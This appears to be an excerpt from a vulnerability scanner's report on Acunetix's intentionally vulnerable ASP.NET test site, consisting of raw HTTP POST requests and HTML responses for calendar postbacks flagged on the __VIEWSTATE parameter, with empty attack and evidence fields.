Request Body - size: 1,123 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8531&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzAHXSdsIHgJTRBYBBgCA7amyUdsIZGRkECdLP1O6NFgHbTvOkNizZrdUKYI%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKvvuGYCgLQp%2BbjBwKqztTQBQKN99ioAwKN99ioAwKN98zPDAKN98zPDAKN9%2BDiBQKN9%2BDiBQKN95S5DQKN95S5DQKN94jcBgKN94jcBgKN97zzDwKN97zzDwKN99CXBwKN99CXBwKN98QqAo33xCoCjfe4kg0Cjfe4kg0CjfesqQYCjfesqQYC5p2%2F3gkC5p2%2F3gkC5p3T8gIC5p3T8gIC5p3HiQoC5p3HiQoC5p37rAMC5p37rAMC5p3vwwwC5p3vwwwC5p2D5gUC5p2D5gUC5p23vQ0C5p23vQ0C5p2r0AYC5p2r0AYC5p2fuQMC5p2fuQMC5p2z3AwC5p2z3AwC%2B6SdxQ8C%2B6SdxQ8C%2B6SxmAcC%2B6SxmAcC%2B6SlPwL7pKU%2FAvuk2dMJAvuk2dMJAvukzfYCAvukzfYCAvuk4Y0KAvuk4Y0KAvuklaADAvuklaADAvukiccMAvukiccMAvuk%2FawJAvuk%2FawJAvukkcMCAvukkcMCAtzL4%2BgFAtzL4%2BgFAtzLl48NAtzLl48NAtzLi6IGAtzLi6IGAtzLv%2FkPAtzLv%2FkPAtzL050HAtzL050HAtzLxzAC3MvHMALcy%2FvXCQLcy%2FvXCQLcy%2B%2FqAgLcy%2B%2FqAgLcy8PTDwLcy8PTDwLcy%2Ff2CALcy%2Ff2CAKx0sGfCgKx0sGfCgKx0vWyAwKx0vWyA0hGw7YgIiB6F5B29o7mCYubAod8
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:22:25 GMT Content-Length: 12416
Response Body - size: 12,416 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzAHXSdsIHgJTRBYBBgCA7amyUdsIZGRkECdLP1O6NFgHbTvOkNizZrdUKYI=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKvvuGYCgLQp+bjBwKqztTQBQKN99ioAwKN99ioAwKN98zPDAKN98zPDAKN9+DiBQKN9+DiBQKN95S5DQKN95S5DQKN94jcBgKN94jcBgKN97zzDwKN97zzDwKN99CXBwKN99CXBwKN98QqAo33xCoCjfe4kg0Cjfe4kg0CjfesqQYCjfesqQYC5p2/3gkC5p2/3gkC5p3T8gIC5p3T8gIC5p3HiQoC5p3HiQoC5p37rAMC5p37rAMC5p3vwwwC5p3vwwwC5p2D5gUC5p2D5gUC5p23vQ0C5p23vQ0C5p2r0AYC5p2r0AYC5p2fuQMC5p2fuQMC5p2z3AwC5p2z3AwC+6SdxQ8C+6SdxQ8C+6SxmAcC+6SxmAcC+6SlPwL7pKU/Avuk2dMJAvuk2dMJAvukzfYCAvukzfYCAvuk4Y0KAvuk4Y0KAvuklaADAvuklaADAvukiccMAvukiccMAvuk/awJAvuk/awJAvukkcMCAvukkcMCAtzL4+gFAtzL4+gFAtzLl48NAtzLl48NAtzLi6IGAtzLi6IGAtzLv/kPAtzLv/kPAtzL050HAtzL050HAtzLxzAC3MvHMALcy/vXCQLcy/vXCQLcy+/qAgLcy+/qAgLcy8PTDwLcy8PTDwLcy/f2CALcy/f2CAKx0sGfCgKx0sGfCgKx0vWyAwKx0vWyA0hGw7YgIiB6F5B29o7mCYubAod8" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8491')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">May 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8552')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8520')" style="color:Black" title="April 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8521')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8522')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8523')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8524')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8525')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8526')" style="color:Black" title="May 06">6</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8527')" style="color:Black" title="May 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8528')" style="color:Black" title="May 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8529')" style="color:Black" title="May 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8530')" style="color:Black" title="May 10">10</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8531')" style="color:White" title="May 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8532')" style="color:Black" title="May 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8533')" style="color:Black" title="May 13">13</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8534')" style="color:Black" title="May 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8535')" style="color:Black" title="May 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8536')" style="color:Black" title="May 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8537')" style="color:Black" title="May 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8538')" style="color:Black" title="May 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8539')" style="color:Black" title="May 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8540')" style="color:Black" title="May 20">20</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8541')" style="color:Black" title="May 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8542')" style="color:Black" title="May 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8543')" style="color:Black" title="May 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8544')" style="color:Black" title="May 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8545')" style="color:Black" title="May 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8546')" style="color:Black" title="May 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8547')" style="color:Black" title="May 27">27</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8548')" style="color:Black" title="May 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8549')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8550')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8551')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8552')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8553')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8554')" style="color:Black" title="June 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8555')" style="color:Black" title="June 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8556')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8557')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8558')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8559')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8560')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8561')" style="color:Black" title="June 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1129 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,129 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8535&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzAHXSdsIHgJTRBYBBgCAlFPXVNsIZGRkZXPdfRJotDa%2B2ktkFb%2F6UVgoLI8%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLK6rvxCwLQp%2BbjBwKqztTQBQKN99ioAwKN99ioAwKN98zPDAKN98zPDAKN9%2BDiBQKN9%2BDiBQKN95S5DQKN95S5DQKN94jcBgKN94jcBgKN97zzDwKN97zzDwKN99CXBwKN99CXBwKN98QqAo33xCoCjfe4kg0Cjfe4kg0CjfesqQYCjfesqQYC5p2%2F3gkC5p2%2F3gkC5p3T8gIC5p3T8gIC5p3HiQoC5p3HiQoC5p37rAMC5p37rAMC5p3vwwwC5p3vwwwC5p2D5gUC5p2D5gUC5p23vQ0C5p23vQ0C5p2r0AYC5p2r0AYC5p2fuQMC5p2fuQMC5p2z3AwC5p2z3AwC%2B6SdxQ8C%2B6SdxQ8C%2B6SxmAcC%2B6SxmAcC%2B6SlPwL7pKU%2FAvuk2dMJAvuk2dMJAvukzfYCAvukzfYCAvuk4Y0KAvuk4Y0KAvuklaADAvuklaADAvukiccMAvukiccMAvuk%2FawJAvuk%2FawJAvukkcMCAvukkcMCAtzL4%2BgFAtzL4%2BgFAtzLl48NAtzLl48NAtzLi6IGAtzLi6IGAtzLv%2FkPAtzLv%2FkPAtzL050HAtzL050HAtzLxzAC3MvHMALcy%2FvXCQLcy%2FvXCQLcy%2B%2FqAgLcy%2B%2FqAgLcy8PTDwLcy8PTDwLcy%2Ff2CALcy%2Ff2CAKx0sGfCgKx0sGfCgKx0vWyAwKx0vWyA7%2BrJ4vZ6FnbH6tJhGY5GyXo9rdK
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:34:05 GMT Content-Length: 12416
Response Body - size: 12,416 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzAHXSdsIHgJTRBYBBgCAlFPXVNsIZGRkZXPdfRJotDa+2ktkFb/6UVgoLI8=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLK6rvxCwLQp+bjBwKqztTQBQKN99ioAwKN99ioAwKN98zPDAKN98zPDAKN9+DiBQKN9+DiBQKN95S5DQKN95S5DQKN94jcBgKN94jcBgKN97zzDwKN97zzDwKN99CXBwKN99CXBwKN98QqAo33xCoCjfe4kg0Cjfe4kg0CjfesqQYCjfesqQYC5p2/3gkC5p2/3gkC5p3T8gIC5p3T8gIC5p3HiQoC5p3HiQoC5p37rAMC5p37rAMC5p3vwwwC5p3vwwwC5p2D5gUC5p2D5gUC5p23vQ0C5p23vQ0C5p2r0AYC5p2r0AYC5p2fuQMC5p2fuQMC5p2z3AwC5p2z3AwC+6SdxQ8C+6SdxQ8C+6SxmAcC+6SxmAcC+6SlPwL7pKU/Avuk2dMJAvuk2dMJAvukzfYCAvukzfYCAvuk4Y0KAvuk4Y0KAvuklaADAvuklaADAvukiccMAvukiccMAvuk/awJAvuk/awJAvukkcMCAvukkcMCAtzL4+gFAtzL4+gFAtzLl48NAtzLl48NAtzLi6IGAtzLi6IGAtzLv/kPAtzLv/kPAtzL050HAtzL050HAtzLxzAC3MvHMALcy/vXCQLcy/vXCQLcy+/qAgLcy+/qAgLcy8PTDwLcy8PTDwLcy/f2CALcy/f2CAKx0sGfCgKx0sGfCgKx0vWyAwKx0vWyA7+rJ4vZ6FnbH6tJhGY5GyXo9rdK" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8491')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">May 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8552')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8520')" style="color:Black" title="April 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8521')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8522')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8523')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8524')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8525')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8526')" style="color:Black" title="May 06">6</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8527')" style="color:Black" title="May 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8528')" style="color:Black" title="May 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8529')" style="color:Black" title="May 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8530')" style="color:Black" title="May 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8531')" style="color:Black" title="May 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8532')" style="color:Black" title="May 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8533')" style="color:Black" title="May 13">13</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8534')" style="color:Black" title="May 14">14</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8535')" style="color:White" title="May 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8536')" style="color:Black" title="May 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8537')" style="color:Black" title="May 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8538')" style="color:Black" title="May 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8539')" style="color:Black" title="May 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8540')" style="color:Black" title="May 20">20</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8541')" style="color:Black" title="May 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8542')" style="color:Black" title="May 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8543')" style="color:Black" title="May 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8544')" style="color:Black" title="May 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8545')" style="color:Black" title="May 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8546')" style="color:Black" title="May 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8547')" style="color:Black" title="May 27">27</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8548')" style="color:Black" title="May 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8549')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8550')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8551')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8552')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8553')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8554')" style="color:Black" title="June 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8555')" style="color:Black" title="June 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8556')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8557')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8558')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8559')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8560')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8561')" style="color:Black" title="June 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1125 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
